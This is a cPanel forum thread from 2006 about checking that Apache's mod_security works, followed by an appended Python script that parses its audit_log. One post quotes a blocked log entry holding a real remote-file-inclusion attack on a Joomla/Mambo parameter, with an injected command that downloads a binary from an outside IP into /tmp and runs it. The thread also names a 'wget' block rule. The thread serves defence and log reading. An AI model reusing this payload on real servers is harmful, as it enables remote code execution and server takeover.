The Community Forums

Interact with an entire community of cPanel & WHM users!

testing mod_security

Discussion in 'Security' started by embsupafly, Mar 9, 2006.

  1. embsupafly

    embsupafly Active Member

    I installed the mod_security module for Apache and added a few example rulesets shared on this forum. Apache started ok when I was done and I did a config test and everything was ok. I tailed /usr/local/apache/logs/audit_log and nothing is showing up, there is actually nothing in the file. Does this mean there are no attacks yet? How can I simulate an attack to ensure that this is working ok?
     
  2. webignition

    webignition Well-Known Member

    The only way to be 100% sure that your rulesets are doing what they should is by checking each rule individually and trying to do something so that the rule is invoked - what this is depends entirely on the rule.

    However, if you want to test things in general, try finding a rule that relates to something inappropriate in a GET request - i.e. something bad in the URL.

    For example, if you have a rule that blocks requests with 'wget' in the URL, try visiting http://www.example.com/?wget and you should notice mod_sec blocking the request.

    If I remember correctly, the audit log is not updated in real time (I might be wrong), so don't expect anything in there immediately.
     
  3. sawbuck

    sawbuck Well-Known Member

  4. embsupafly

    embsupafly Active Member

    What were the attackers trying to do here?

    Code:
    Request: ***.***.com 82.185.246.179 - - [09/Mar/2006:04:33:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo|  HTTP/1.1" 403 426 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - "-"
    ----------------------------------------
    GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo|  HTTP/1.1
    Host: **.**.***.***
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
    mod_security-message: Access denied with code 403. Pattern match "wget " at THE_REQUEST
    mod_security-action: 403
    
    HTTP/1.1 403 Forbidden
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
    --65e08270--
    
     
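A small parser for entries in this audit_log layout, added here as an example (it is not code from the thread or from mod_security itself): it lists which requests a rule actually blocked, which is the quickest way to confirm the ruleset fires after sending the kind of harmless test request suggested earlier in the thread. The entry layout and the trailing "--<hex>--" boundary line are assumed from the excerpt above; hosts and IPs in the sample are placeholders.

```python
import re

# Constructed sample in the layout of the mod_security 1.x audit_log entry
# quoted above (placeholder host/IPs; the first request carries a harmless
# "wget " string just to trip that rule, the second is unflagged traffic).
SAMPLE_AUDIT_LOG = """\
Request: www.example.com 192.0.2.10 - - [09/Mar/2006:04:33:41 -0500] "GET /index.php?q=wget%20test HTTP/1.1" 403 426 "-" "Mozilla/4.0" - "-"
----------------------------------------
GET /index.php?q=wget%20test HTTP/1.1
Host: www.example.com
mod_security-message: Access denied with code 403. Pattern match "wget " at THE_REQUEST
mod_security-action: 403

HTTP/1.1 403 Forbidden
--65e08270--
Request: www.example.com 192.0.2.11 - - [09/Mar/2006:04:40:02 -0500] "GET /index.php HTTP/1.1" 200 1024 "-" "curl/7.15" - "-"
----------------------------------------
GET /index.php HTTP/1.1
Host: www.example.com

HTTP/1.1 200 OK
--65e08271--
"""

# Entries end with a "--<hex>--" boundary line (layout assumed from the excerpt).
BOUNDARY_RE = re.compile(r"^--[0-9a-f]+--$", re.M)
REQUEST_RE = re.compile(r'^Request: (\S+) (\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})', re.M)
MESSAGE_RE = re.compile(r"^mod_security-message: (.*)$", re.M)
ACTION_RE = re.compile(r"^mod_security-action: (\S+)$", re.M)
PATTERN_RE = re.compile(r'Pattern match "(.*?)" at (\S+)')


def parse_audit_log(text: str) -> list[dict[str, str]]:
    """One record per entry that mod_security flagged; unflagged traffic is skipped."""
    records = []
    for entry in BOUNDARY_RE.split(text):
        req = REQUEST_RE.search(entry)
        msg = MESSAGE_RE.search(entry)
        if not req or not msg:       # no mod_security-message: nothing was blocked
            continue
        action = ACTION_RE.search(entry)
        pat = PATTERN_RE.search(msg.group(1))
        records.append({
            "host": req.group(1), "client": req.group(2), "time": req.group(3),
            "request": req.group(4), "status": req.group(5), "message": msg.group(1),
            "action": action.group(1) if action else "",
            "pattern": pat.group(1) if pat else "",    # e.g. 'wget '
            "location": pat.group(2) if pat else "",   # e.g. THE_REQUEST
        })
    return records
```

Run it against the real /usr/local/apache/logs/audit_log after sending a test request such as the `?wget` URL above; an empty result means no rule matched, so the log being empty is not by itself proof that mod_security is working.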